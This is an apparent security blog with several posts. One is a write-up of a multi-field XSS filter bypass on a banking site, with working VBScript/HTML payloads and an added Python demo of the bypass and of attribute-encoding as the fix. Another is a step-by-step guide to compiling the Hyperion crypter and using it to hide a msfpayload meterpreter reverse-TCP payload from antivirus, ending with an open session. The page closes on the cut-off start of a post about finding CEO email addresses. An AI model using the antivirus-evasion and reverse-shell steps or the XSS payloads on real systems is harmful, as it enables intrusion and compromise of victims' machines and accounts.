3ncrypt0r's Blog, by Shubham Mittal<br />
<br />
<b>Multi-Stage Payload : Cross Site Scripting Encounter</b> (published 2013-07-31)<br />
<span style="font-size: small;"><span style="font-family: inherit;">Hi All,</span></span><br />
<span style="font-size: small;"><span style="font-family: inherit;"><br /></span></span>
<span style="font-size: small;"><span style="font-family: inherit;">This blog post describes a Cross Site Scripting issue I found in a banking application while testing it. Obviously I cannot disclose the name, so you will have to take my word for it.</span></span><br />
<span style="font-size: small;"><span style="font-family: inherit;"><br /></span></span>
<span style="font-size: small;"><span style="font-family: inherit;">The reason I am writing a blog post about "just an XSS" is that I thought this one was a bit different from what we usually keep finding.</span></span><br />
<span style="font-size: small;"><span style="font-family: inherit;"><br /></span></span>
<span style="font-size: small;"><span style="font-family: inherit;">There were quite a number of filters and constraints that kept me busy with it for some time.</span></span><br />
<span style="font-size: small;"><span style="font-family: inherit;"><br /></span></span>
<span style="font-size: small;"><span style="font-family: inherit;"><i>Restriction 1:</i> Tags were not allowed. Any input that completed a tag closed the session. Note, though, that an opening tag on its own was allowed.</span></span><br />
<span style="font-size: small;"><span style="font-family: inherit;"><br /></span></span>
<span style="font-size: small;"><span style="font-family: inherit;"><i>Restriction 2: </i>Whatever you injected, the application reflected it in upper case, so, dude, no JavaScript for you.</span></span><br />
<span style="font-size: small;"><span style="font-family: inherit;"><br /></span></span>
<span style="font-size: small;"><span style="font-family: inherit;"><i>Restriction 3:</i> Maximum length of 35 characters.</span></span><br />
<span style="font-size: small;"><span style="font-family: inherit;"><br /></span></span>
<span style="font-size: small;"><span style="font-family: inherit;">One plus point: the web application was only accessible in IE.</span></span><br />
<span style="font-size: small;"><span style="font-family: inherit;"><br /></span></span>
<span style="font-size: small;"><span style="font-family: inherit;">When I started the test I disliked this fact, but by the end I loved it.
I tried VBScript payloads, but the tag and length restrictions were the real problem.</span></span><br />
<span style="font-size: small;"><span style="font-family: inherit;"><br /></span></span>
<span style="font-size: small;"><span style="font-family: inherit;">As there were four input parameters, I thought of breaking my payload into parts and injecting each part separately.</span></span><br />
<span style="font-size: small;"><span style="font-family: inherit;"><br /></span></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><span style="font-family: inherit;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhFhlGgakULC1gWKK4KsShsiILnrG6ks4MGAcmwt_yeThAPfYyHnBNP3Vma7pSy-YWSO8D6C7vqkIAGV63cqIUSej3ifY6jWP3Al3j-uZtpa3UGPxh-qFKE-PILXlz400prIf96m42dN3Bn/s1600/1.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="245" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhFhlGgakULC1gWKK4KsShsiILnrG6ks4MGAcmwt_yeThAPfYyHnBNP3Vma7pSy-YWSO8D6C7vqkIAGV63cqIUSej3ifY6jWP3Al3j-uZtpa3UGPxh-qFKE-PILXlz400prIf96m42dN3Bn/s400/1.JPG" width="400" /></a></span></span></div>
<span style="font-size: small;"><span style="font-family: inherit;"><br /></span></span>
<span style="font-size: small;"><span style="font-family: inherit;"><br /></span></span>
<span style="font-size: small;"><span style="font-family: inherit;">I tried opening an img src in one input and, using a single-quote trick, carrying the alert part over to the next input, so my payloads were:</span></span><br />
<span style="font-size: small;"><span style="font-family: inherit;"><br /></span></span>
<span style="font-size: small;"><span style="font-family: inherit;">1st Payload: <b>"&gt;&lt;img src='a</b></span></span><br />
<span style="font-size: small;"><span style="font-family: inherit;">2nd Payload: <b>' onerror=alert(1) size="</b></span></span><br />
<span style="font-size: small;"><span style="font-family: inherit;"><br /></span></span>
<span style="font-size: small;"><span style="font-family: inherit;">The idea was that whatever the page emitted between the first and the second reflection would become the value of the src attribute. It didn't work, though: there was already a single quote between the two reflection points, which terminated the attribute value early.</span></span><br />
<span style="font-size: small;"><span style="font-family: inherit;"><br /></span></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><span style="font-family: inherit;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgsnAwiCqJDixPgikSD8enDVSd6hVt7DhZiVskNcmtgV3f8BNkmJmPKX-t37sZMXSCJwpsxphQg-9AmiR_iqhP80A7RLh2YfR7U6iSm9nNZd-5wQFUCOrNpNwX0QslRsOgrAXDcbI-Nqljy/s1600/2.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="260" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgsnAwiCqJDixPgikSD8enDVSd6hVt7DhZiVskNcmtgV3f8BNkmJmPKX-t37sZMXSCJwpsxphQg-9AmiR_iqhP80A7RLh2YfR7U6iSm9nNZd-5wQFUCOrNpNwX0QslRsOgrAXDcbI-Nqljy/s400/2.JPG" width="400" /></a></span></span></div>
<span style="font-size: small;"><span style="font-family: inherit;"><br /></span></span>
<span style="font-size: small;"><span style="font-family: inherit;">In place of single quotes, another idea was a pair of /* and */, but this didn't work either.</span></span><br />
<span style="font-size: small;"><span style="font-family: inherit;"><br /></span></span>
<span style="font-size: small;"><span style="font-family: inherit;">3rd option: CDATA, i.e. a pair of <b>&lt;![CDATA[</b> and <b>]]&gt;</b>. This didn't work either, and I later realised it was a silly idea. How can I put a tag inside a tag? Syntactically wrong.</span></span><br />
<span style="font-size: small;"><span style="font-family: inherit;"><br /></span></span>
<span style="font-size: small;"><span style="font-family: inherit;">4th option: use the eval function, so the possible payloads were:</span></span><br />
<span style="font-size: small;"><span style="font-family: inherit;"><br /></span></span>
<span style="font-size: small;"><span style="font-family: inherit;">1st payload: <b>"&gt;&lt;IMG SRC=JAVASCRIPT:ALERT(</b></span></span><br />
<span style="font-size: small;"><span style="font-family: inherit;">2nd Payload:<b> ) ONERROR=ALERT(1) SIZE="</b></span></span><br />
<span style="font-size: small;"><span style="font-family: inherit;"><br /></span></span>
<span style="font-size: small;"><span style="font-family: inherit;">This also failed, for one reason. Guess what: JavaScript is case sensitive.</span></span><br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><span style="font-family: inherit;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEixC22o6nJQ0a3wbYKmSZLb-Yj6SmwS7pPYk3BgQutlapr40D3L50OHijlzZ3ZC8wKC9aDlEE9gY2yJagUhIuCqzNh0JSP3k8N7xwHkhOh0FwkA4dKoMX1jZIoYfPDyaHPX9SfUUc_LgVV5/s1600/3.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="147" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEixC22o6nJQ0a3wbYKmSZLb-Yj6SmwS7pPYk3BgQutlapr40D3L50OHijlzZ3ZC8wKC9aDlEE9gY2yJagUhIuCqzNh0JSP3k8N7xwHkhOh0FwkA4dKoMX1jZIoYfPDyaHPX9SfUUc_LgVV5/s400/3.JPG" width="400" /></a></span></span></div>
<br />
<span style="font-size: small;"><span style="font-family: inherit;">But this one popped something cool into my mind: why not use an A href with VBScript? The application already ran only in IE, so all potential victims would be using IE.</span></span><br />
<span style="font-size: small;"><span style="font-family: inherit;"><br /></span></span>
<span style="font-size: small;"><span style="font-family: inherit;">So I crafted the payloads as:</span></span><br />
<span style="font-size: small;"><span style="font-family: inherit;"><br /></span></span>
<span style="font-size: small;"><span style="font-family: inherit;">1st payload: <b>"&gt;&lt;A HREF="VBSCRIPT:MSGBOX(1)"</b></span></span><br />
<span style="font-size: small;"><span style="font-family: inherit;">2nd Payload: <b>"&gt;)AAAAA&gt;&lt;A"</b></span></span><br />
<span style="font-size: small;"><span style="font-family: inherit;"><br /></span></span>
<span style="font-size: small;"><span style="font-family: inherit;">This time the payload was injected, but it didn't give me a hyperlink on the page, just the plain text "AAAAA". I realised the reflections were landing inside two tables, so why not close them using two more parameters? We already had four vulnerable parameters.</span></span><br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><span style="font-family: inherit;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhfrsouFzI8zDUJDIgk5-VUqLNTxGVqbiVaWyNAd_1ZeEQ1YNXsmg7mmMSpvLBWGRpezWh2PCLD4-K-HKwlpykqONDMX4gygvocUPPyd9RmftPgz0etCIgcFEUX7v5ATJIeBqYVmsR6SRH_/s1600/4.JPG" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="138" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhfrsouFzI8zDUJDIgk5-VUqLNTxGVqbiVaWyNAd_1ZeEQ1YNXsmg7mmMSpvLBWGRpezWh2PCLD4-K-HKwlpykqONDMX4gygvocUPPyd9RmftPgz0etCIgcFEUX7v5ATJIeBqYVmsR6SRH_/s400/4.JPG" width="400" /></a></span></span></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><span style="font-family: inherit;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhdlGKyIINmdAglqK8GzriGbZpceJDcWqZyI_FLiJJ85kGUxOJjceaEhm7pfRYmHU6apVGXfytdp61FszlbKA2iH9tGRbiYXwv_c84Oxfbj1OZ6XTHMNbsP57qvBBXjoVzpowerLTPSxIVA/s1600/5.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="191" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhdlGKyIINmdAglqK8GzriGbZpceJDcWqZyI_FLiJJ85kGUxOJjceaEhm7pfRYmHU6apVGXfytdp61FszlbKA2iH9tGRbiYXwv_c84Oxfbj1OZ6XTHMNbsP57qvBBXjoVzpowerLTPSxIVA/s400/5.JPG" width="400" /></a></span></span></div>
<span style="font-size: small;"><span style="font-family: inherit;">The next set of payloads I tried:</span></span><br />
<span style="font-size: small;"><span style="font-family: inherit;"><br /></span></span>
<span style="font-size: small;"><span style="font-family: inherit;">1st Payload: <b>"&gt;&lt;/TABLE b="</b><br />2nd Payload: <b>"&gt;&lt;/TABLE b="</b><br />3rd Payload: <b>"&gt;&lt;A HREF="VBSCRIPT:MSGBOX(1)"</b><br />4th Payload: <b>"&gt;)AAAAA&gt;&lt;A"</b></span></span><br />
<span style="font-size: small;"><span style="font-family: inherit;"><br /></span></span>
<span style="font-size: small;"><span style="font-family: inherit;">Each time, I folded the leftover part of the original "value" attribute into the tag I was injecting, i.e. into the TABLE or A tag.</span></span><br />
<span style="font-size: small;"><span style="font-family: inherit;"><br /></span></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><span style="font-family: inherit;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgZ_Wrui2KI7q1Jyh7MLa7oU1jQuA2jqafpF91lqMVsTi2nlLJAsQqYsZ7cgLjJ5cqQslZChQjqRrGO3pv12pgLyNsLCsi-qVFOzBfYuQ9rkYizRFUlUiW98cREvFoUa_4Q3LnqVPli0Wn7/s1600/6.JPG" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="290" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgZ_Wrui2KI7q1Jyh7MLa7oU1jQuA2jqafpF91lqMVsTi2nlLJAsQqYsZ7cgLjJ5cqQslZChQjqRrGO3pv12pgLyNsLCsi-qVFOzBfYuQ9rkYizRFUlUiW98cREvFoUa_4Q3LnqVPli0Wn7/s400/6.JPG" width="400" /></a></span></span></div>
<span style="font-size: small;"><span style="font-family: inherit;"><br /></span></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><span style="font-family: inherit;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiMej0s5iUB13R-pqOtqwrBMCUGBAvCk0Ap3N8cCqg8zLAtfemuAJZf3XdWcmxM8azTV_BNDyKgPDS5ikDfLPxEK6xMHKWiG0y96KuGc2Ohiw4AbSHMcqWkJsL3O1BPCClUchWE9LQPeacg/s1600/7.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="182" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiMej0s5iUB13R-pqOtqwrBMCUGBAvCk0Ap3N8cCqg8zLAtfemuAJZf3XdWcmxM8azTV_BNDyKgPDS5ikDfLPxEK6xMHKWiG0y96KuGc2Ohiw4AbSHMcqWkJsL3O1BPCClUchWE9LQPeacg/s400/7.JPG" width="400" /></a></span></span></div>
<span style="font-size: small;"><span style="font-family: inherit;"><br /></span></span>
<span style="font-size: small;"><span style="font-family: inherit;"><br /></span></span>
<span style="font-size: small;"><span style="font-family: inherit;">Result : POP UP. </span></span><br />
<span style="font-size: small;"><span style="font-family: inherit;"><br /></span></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><span style="font-family: inherit;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiFLvYMjfScFm8i2uhiZ4AzJ8ay2ebU7y9MkCw8INPvacArrcWjwKbyLBANLXKciX-pkq_M1MYi-UqsQZv16yFOsv599pegxw-g9PXgWvdxONgbr7fUNSoPSMPyqcWje3dx4mKqapXH2hqY/s1600/8.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="187" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiFLvYMjfScFm8i2uhiZ4AzJ8ay2ebU7y9MkCw8INPvacArrcWjwKbyLBANLXKciX-pkq_M1MYi-UqsQZv16yFOsv599pegxw-g9PXgWvdxONgbr7fUNSoPSMPyqcWje3dx4mKqapXH2hqY/s400/8.JPG" width="400" /></a></span></span></div>
<span style="font-size: small;"><span style="font-family: inherit;"><br /></span></span>
<span style="font-size: small;"><span style="font-family: inherit;"><br /></span></span><br />
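To show why the three filters above fail against a payload split across reflected fields, and what the fix at the reflection point looks like, here is an added Python example (not the bank's code and not from the original post). The filter logic and the page template are reconstructions based on the restrictions described above and are assumptions; the four payloads are the ones quoted in the post.<br />

```python
import html
import re

MAX_LEN = 35  # Restriction 3 from the post: per-field maximum length

# Constructed page skeleton (an assumption, not the bank's markup): the four
# user values are reflected into value="..." attributes, with three of them
# inside a nested table, matching the post's "two tables" observation.
TEMPLATE = (
    '<table><tr><td><input value="{0}"></td>'
    '<table><tr><td><input value="{1}"></td>'
    '<td><input value="{2}"></td>'
    '<td><input value="{3}"></td></tr></table>'
    '</tr></table>'
)

# The final four payloads quoted in the post, one per reflected field.
PAYLOADS = [
    '"></TABLE b="',
    '"></TABLE b="',
    '"><A HREF="VBSCRIPT:MSGBOX(1)"',
    '">)AAAAA><A"',
]


def weak_filter(value):
    """Reconstruction of the three filters the post describes (an assumption).

    Returns the value as the application reflected it, or raises where the
    application would have closed the session.
    """
    if len(value) > MAX_LEN:                       # Restriction 3: length
        raise ValueError("longer than %d characters" % MAX_LEN)
    lt = value.find("<")
    if lt != -1 and ">" in value[lt:]:             # Restriction 1: completed tag
        raise ValueError("completed tag, session closed")
    return value.upper()                           # Restriction 2: upper-cased


def passes_weak_filter(value):
    """True when a single field, inspected on its own, survives the filter."""
    try:
        weak_filter(value)
        return True
    except ValueError:
        return False


def safe_encode(value):
    """Context-aware fix: HTML-attribute-encode every reflected value.

    html.escape(quote=True) turns & < > " ' into entities, so no field can
    close the value="..." attribute or open a tag, however the payload is
    split across fields. Length limits and upper-casing add nothing.
    """
    return html.escape(value, quote=True)


def render(fields, encoder):
    """Reflect the four fields into the page through the given encoder."""
    if len(fields) != 4:
        raise ValueError("template expects exactly four fields")
    return TEMPLATE.format(*(encoder(f) for f in fields))


_TAG_RE = re.compile(r"<(/?[A-Za-z]+)[^<>]*>")


def tag_names(markup):
    """Lower-cased names of every complete tag in the markup."""
    return {m.group(1).lower() for m in _TAG_RE.finditer(markup)}


def injected_tags(rendered):
    """Tags present in the rendered page that the template never emits."""
    return sorted(tag_names(rendered) - tag_names(TEMPLATE))


if __name__ == "__main__":
    # Every field passes on its own, yet the concatenated page grows an <a>.
    print([passes_weak_filter(p) for p in PAYLOADS])      # [True, True, True, True]
    print(injected_tags(render(PAYLOADS, weak_filter)))  # ['a']
    print(injected_tags(render(PAYLOADS, safe_encode)))  # []
```

Per-field checks never see the concatenated output, which is why the split works; encoding for the attribute context at the point of reflection makes the split irrelevant.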
<div style="text-align: center;">
<span style="font-size: small;"><span style="font-family: inherit;">You can learn Ethical Hacking from the Infosec Institute, one of the leading institutes in the field of Information Security training: <a href="http://www.infosecinstitute.com/courses/ethical_hacking_training.html">http://www.infosecinstitute.com/courses/ethical_hacking_training.html</a></span></span><br />
<span style="font-size: small;"><span style="font-family: inherit;"><br /></span></span>
<span style="font-size: small;"><span style="font-family: inherit;">Learn Adobe CQ Pentesting from this resource: </span></span><a href="http://resources.infosecinstitute.com/adobe-cq-pentesting-guide-part-1/">http://resources.infosecinstitute.com/adobe-cq-pentesting-guide-part-1/</a></div>
<span style="font-size: small;"><span style="font-family: inherit;"><br /></span></span>
<b>Bypassing Antivirus with PE Crypters</b> (published 2012-09-07)<br />
<br />
Most of the time when we do a penetration test, we are facing a super cool AV protection which stops us from executing our lovely EXEs, shellcodes, etc.<br />
<br />
I was looking around for the same and, from a presentation by Mr. Dave Kennedy at DerbyCon, I got something quite useful. He used some words like "shellcodexec" and "PE crypters". On digging around, I found that shellcodexec is a small utility that injects a shellcode into any process and thus executes your malicious intentions. The approach is: when there is no file at all, what signature will the AVs match? However, shellcodexec is itself getting caught nowadays, so I would not suggest you go for it.<br />
<br />
On the other hand, PE Crypters (from the Nullsecurity team) will encrypt a binary file with a sexy crypting approach and thus can be used to bypass the AV. The whole project runs under the name of the HYPERION project and is a proper working way to mess around with AVs. So let's start.<br />
<br />
AVs have long been good at detecting the templates with which we encrypt our EXEs, and likewise the decryption routine the program uses to reach the actual offset; AVs started matching on those, with the result of "Detection". In this PE crypter the payload is not scrambled; instead it is encapsulated. A different key is used as the cipher key every time, and at execution time it is brute-forced. So it will take time, huh? Well, yes, it will take time if our key is long, so we keep our key short and everything goes fine. That, in short, is what the Hyperion PE crypter does: a weak 128-bit AES key is used to encapsulate the packet, and it is simply brute-forced at execution time. If you want to give it a hardcore look, check out this research paper (<a href="http://www.exploit-db.com/wp-content/themes/exploit/docs/18849.pdf">http://www.exploit-db.com/wp-content/themes/exploit/docs/18849.pdf</a>)<br />
<br />
Anyway, for the super cool guys that was enough. But since only the source files are available for now, this can be a little troublesome for those who are new to these things :P, so let me give a walkthrough. First of all choose your platform; I prefer Linux all the way, but it's your system and your choice too.<br />
<br />
<span style="font-size: large;">Next <a href="http://www.nullsecurity.net/tools/binary/Hyperion-1.0.zip">Download the project</a>;</span><br />
or use: <i>wget http://nullsecurity.net/tools/binary/Hyperion-1.0.zip</i><br />
<i><br /></i>
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgakWgDHQTS8jqp-UYp-EKnwIqkvgHqm9am4fPkDJ33GaOSx_atq4jstoomzRpHBZzL8sz5rWd70Na3UXub6WSN2L-6clRWpoLCXZflT_cDbKSIiyv3E6ArWgHoyfsf137BW5Q4U5OKPmi3/s1600/1.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em; text-align: center;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgakWgDHQTS8jqp-UYp-EKnwIqkvgHqm9am4fPkDJ33GaOSx_atq4jstoomzRpHBZzL8sz5rWd70Na3UXub6WSN2L-6clRWpoLCXZflT_cDbKSIiyv3E6ArWgHoyfsf137BW5Q4U5OKPmi3/s400/1.PNG" height="165" width="400" /></a>
<br />
<span style="font-size: large;">Unzip It. </span><br />
<i>unzip Hyperion-1.0.zip</i><br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhKG3UqX1uG4l60EBBLgyMI1BTacLaC-WleJvFHceXMdlhqsZnDpQ32h4BBrtRSaPQd6PlqOyuOuIEOX7p-uye1qqjJs5KMJ0k3SZFj-2OtLCjumyZK5PCR4DNo6l4fLfUhOrtlJmQcAEpr/s1600/2.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em; text-align: center;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhKG3UqX1uG4l60EBBLgyMI1BTacLaC-WleJvFHceXMdlhqsZnDpQ32h4BBrtRSaPQd6PlqOyuOuIEOX7p-uye1qqjJs5KMJ0k3SZFj-2OtLCjumyZK5PCR4DNo6l4fLfUhOrtlJmQcAEpr/s1600/2.PNG" /></a>
<br />
<span style="font-size: large;">Change into the unpacked directory, and compile it.</span><br />
<i>cd Hyperion-1.0</i><br />
<i>wine /root/drive_c/MinGW/bin/g++ Src/Crypter/*.cpp -o shubham.exe</i><br />
<i><br /></i>
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgu9AMMQaaywb8C3obfQmHYaC9Dp-LdY2uYhiXzV1lWw1z_kxXMVhDUXMw3BWIGv3dI3ZA0yDoQ_uRH-IVjFGzOXaL4XyS2WUf-SfAa7OhnkgrzMs_VU5phElOfwEkEJWcdYe77oHxVIiZP/s1600/3.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em; text-align: center;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgu9AMMQaaywb8C3obfQmHYaC9Dp-LdY2uYhiXzV1lWw1z_kxXMVhDUXMw3BWIGv3dI3ZA0yDoQ_uRH-IVjFGzOXaL4XyS2WUf-SfAa7OhnkgrzMs_VU5phElOfwEkEJWcdYe77oHxVIiZP/s640/3.PNG" height="232" width="640" /></a>
<br />
<br />
Once you have created the executable for crypting, shubham.exe in this case, you can start playing around with EXEs. I am creating an msfpayload for a reverse connection; once it is crypted using Hyperion, it must bypass the AV and still send back the reverse connection.<br />
<br />
<span style="font-size: large;">Create the Payload.</span><br />
<i>msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.242.128 LPORT=4444 X > msf1.exe</i><br />
<i><br /></i>
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjW1JG9Sbdv0Hxa-TI8UECoNaViCdZE43Ow3XPIgyuNbREUZ7ghHBh8YbXlbI1JZBv65Dbe56lsVUfCon2TmX7YQ_EMMWwB4Z67fp3x6voz1JloreB7cMLQLOZxZ7GRxwaSKfo2471BkqXl/s1600/4.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em; text-align: center;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjW1JG9Sbdv0Hxa-TI8UECoNaViCdZE43Ow3XPIgyuNbREUZ7ghHBh8YbXlbI1JZBv65Dbe56lsVUfCon2TmX7YQ_EMMWwB4Z67fp3x6voz1JloreB7cMLQLOZxZ7GRxwaSKfo2471BkqXl/s640/4.PNG" height="240" width="640" /></a>
<br />
<br />
<span style="font-size: large;">Scan it. </span><br />
Once the payload is ready, we will scan it first (without crypting).<br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhaS_q8tPCbvN3Ayt6jqH383FxD7lfie3l6dencQ2ZF1-PIChC6rVVOpFVyh3m_M8PzfJGGRv1325eN2o_hOp7Aivam3kfg_q8FMvgHDgXzLRgTTYJSutP08xv54kJWxkW6_AzQu20_yQV3/s1600/5.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em; text-align: center;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhaS_q8tPCbvN3Ayt6jqH383FxD7lfie3l6dencQ2ZF1-PIChC6rVVOpFVyh3m_M8PzfJGGRv1325eN2o_hOp7Aivam3kfg_q8FMvgHDgXzLRgTTYJSutP08xv54kJWxkW6_AzQu20_yQV3/s640/5.PNG" height="337" width="640" /></a>
<br />
<br />
<span style="font-size: large;">Let's crypt it with Hyperion.</span><br />
<i>wine shubham.exe /root/Desktop/msf1.exe /root/Desktop/msf2.exe</i><br />
<i>ls -l</i><br />
<i><br /></i>
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg2sNadM8QWJ1qx8vm6xUPoZg65-clTG4Lx89H4ZrMKR3DGCi2S4AlyEn2gBL2khmFNjKToH0cSpUWbeS4hqbjal7GHQ_QlRshDLFYAZ8D64QTA2IppsbUmP2QhgV-2kthJXtXPz5nAj7bh/s1600/6.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em; text-align: center;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg2sNadM8QWJ1qx8vm6xUPoZg65-clTG4Lx89H4ZrMKR3DGCi2S4AlyEn2gBL2khmFNjKToH0cSpUWbeS4hqbjal7GHQ_QlRshDLFYAZ8D64QTA2IppsbUmP2QhgV-2kthJXtXPz5nAj7bh/s640/6.PNG" height="324" width="640" /></a>
<br />
<i><br /></i>
<span style="font-size: large;">Scan it.</span><br />
No Detection<br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh_GzbWK-HFeYeP57VTGrV-LvTEiJEsE-A0F4TI_T7c2-xW05J11SqavVzPY4CI4WSebB4Z3ZnQXkedp3fDQ_P-pMC-f2bYNpeLEA7sKu3nsGv9pj0AlkIILcSjXTYh75NWaG0vi4YojHDg/s1600/7.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em; text-align: center;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh_GzbWK-HFeYeP57VTGrV-LvTEiJEsE-A0F4TI_T7c2-xW05J11SqavVzPY4CI4WSebB4Z3ZnQXkedp3fDQ_P-pMC-f2bYNpeLEA7sKu3nsGv9pj0AlkIILcSjXTYh75NWaG0vi4YojHDg/s640/7.PNG" height="286" width="640" /></a>
<br />
<br />
<span style="font-size: large;">Execute it.</span><br />
As soon as you execute it, it starts brute-forcing the key, which pushes CPU usage to 100%.<br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhdHEMsK7BK4DhXRbVn7_R1ieDMFRSza1E7Z_fMFZallLVaPEHW8gvJYW0Z9SBuB7B8ooYTOz-Cbx_9Ry5hJNbfzDUZzEkhQApNz9yqIEilc13g508oSg6BQ1O8aYzn-7LomEC6U7cSCglK/s1600/8.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em; text-align: center;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhdHEMsK7BK4DhXRbVn7_R1ieDMFRSza1E7Z_fMFZallLVaPEHW8gvJYW0Z9SBuB7B8ooYTOz-Cbx_9Ry5hJNbfzDUZzEkhQApNz9yqIEilc13g508oSg6BQ1O8aYzn-7LomEC6U7cSCglK/s640/8.png" height="356" width="640" /></a>
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<span style="font-size: large;">Enjoy It.</span><br />
As soon as the brute force finishes, CPU usage drops back to normal and a session is generated.<br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg-eRnUkkhUJHKpVio8BwRWb5FiCPUyOqoL-18297xjianXHAt38Ly8asXz1puog0a_fo60GIneZjY8oYfS3UK7Z2KOJ2btqvFtI02xP8XNWj4UuHSJMvitggIn3CrjkZLgxMl8_xt9E7iW/s1600/9.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em; text-align: center;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg-eRnUkkhUJHKpVio8BwRWb5FiCPUyOqoL-18297xjianXHAt38Ly8asXz1puog0a_fo60GIneZjY8oYfS3UK7Z2KOJ2btqvFtI02xP8XNWj4UuHSJMvitggIn3CrjkZLgxMl8_xt9E7iW/s640/9.png" height="358" width="640" /></a>
<br />
<br />
I hope this was OKAY for you and you enjoyed it. My next post will be about another way to Bypass Antiviruses.<br />
<br />
Stay Focused; & Keep exploiting. :)<br />
<br />
<br />
Learn Android Pentesting Part 1 From this resource: <a href="http://resources.infosecinstitute.com/android-application-security-testing-guide-part-1/">http://resources.infosecinstitute.com/android-application-security-testing-guide-part-1/</a><br />
<br />
<br />
<br />
<br />Shubham Mittalhttp://www.blogger.com/profile/16532487601818259817noreply@blogger.com240tag:blogger.com,1999:blog-1976569363702642300.post-58247137167078270802012-08-31T00:07:00.002-07:002012-09-07T02:53:39.557-07:00Contact the CEO of a company with a social approach.<span style="font-family: inherit;">Most of the time, when you send a mail to info@anycompany.com,
believe me, there is very little chance that you will get a good
response. The reason is as simple as the number of bounces your email will
go through before it reaches the right person. So why not send it directly to
the targeted person?</span><br />
<div class="MsoNormal" style="margin-bottom: .0001pt; margin-bottom: 0in;">
<span style="font-family: inherit;"><br /></span></div>
<div class="MsoNormal" style="margin-bottom: .0001pt; margin-bottom: 0in;">
<span style="font-family: inherit;">To put it more plainly, don't you think writing this mail
directly to the CEO of that company would do some good?</span></div>
<div class="MsoNormal" style="margin-bottom: .0001pt; margin-bottom: 0in;">
<span style="font-family: inherit;"><br /></span></div>
<div class="MsoNormal" style="margin-bottom: .0001pt; margin-bottom: 0in;">
<span style="font-family: inherit;">I was going through some Chrome extensions and found one which
can help with this. Yes, we can go ahead and get the email ID of a CEO
directly without any co-operation from any living body.</span></div>
<div class="MsoNormal" style="margin-bottom: .0001pt; margin-bottom: 0in;">
<span style="font-family: inherit;"><br /></span></div>
<div class="MsoNormal" style="margin-bottom: .0001pt; margin-bottom: 0in;">
<span style="font-family: inherit;">So to do this, you have to count on me (only for about 5
minutes) and do what I say.</span></div>
